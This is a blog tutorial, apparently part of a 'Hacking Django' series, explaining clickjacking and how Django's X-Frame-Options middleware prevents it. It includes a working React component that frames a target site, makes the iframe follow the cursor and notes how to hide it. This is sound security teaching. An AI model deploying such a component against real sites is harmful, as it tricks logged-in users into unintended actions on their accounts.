Part 2 of the “Hacking Django” series: part 1, part 3
Clickjacking is an attack where one of your logged-in user visits a malicious website, and that website tricks the user into interacting with your website via an iframe.
As an example, see the green “create pull request” button which will create a Pull Request on GitHub as the logged in user:
Let’s say the malicious website has some nefarious React:
import React from 'react'; export default function (props) { const [position, setPosition] = React.useState({ clientX: 0, clientY: 0 }); const updatePosition = event => { const { pageX, pageY, clientX, clientY } = event; setPosition({ clientX, clientY,}); }; React.useEffect(() => { document.addEventListener("mousemove", updatePosition, false); document.addEventListener("mouseenter", updatePosition, false); return () => { document.removeEventListener("mousemove", updatePosition); document.removeEventListener("mouseenter", updatePosition); }; }, []); return ( <> <iframe style={{zIndex: 100, position: 'absolute', top: position.clientY-200, left: position.clientX-650}} src="<path-to-target-website>" width="750px" height="500px" /> <div>Some website content</div> </> ); }
When one of the logged in users accesses the malicious website this happens: the iframe follows the mouse so that the button is on the mouse. When the user clicks, they click on the iframe.
Now that is very obvious – the user can see the iframe, but that’s one change away: style={{display: 'none', ...}}
. For the sake of the demo I used style={{opacity: '0.1', ...}}
(otherwise you would see nothing interesting):
Clickjack prevention middleware
The solution is simple: to set iframe embed policy for your website: adding django.middleware.clickjacking.XFrameOptionsMiddleware
to settings MIDDLEWARE
and X_FRAME_OPTIONS = 'SAMEORIGIN'
will result in X-Frame-Options
header with value of SAMEORIGIN
, and modern browsers will then prevent your website from being embedded on other websites.
Continue reading: part 1, part 3
Does your website have security vulnerabilities?
Over time it’s easy for security vulnerabilities and tech debt to slip into your codebase. I can check clickjacking vulnerability and many others for for free you at https://django.doctor. I’m a Django code improvement bot:
If you would prefer security holes not make it into your codebase, I also review pull requests: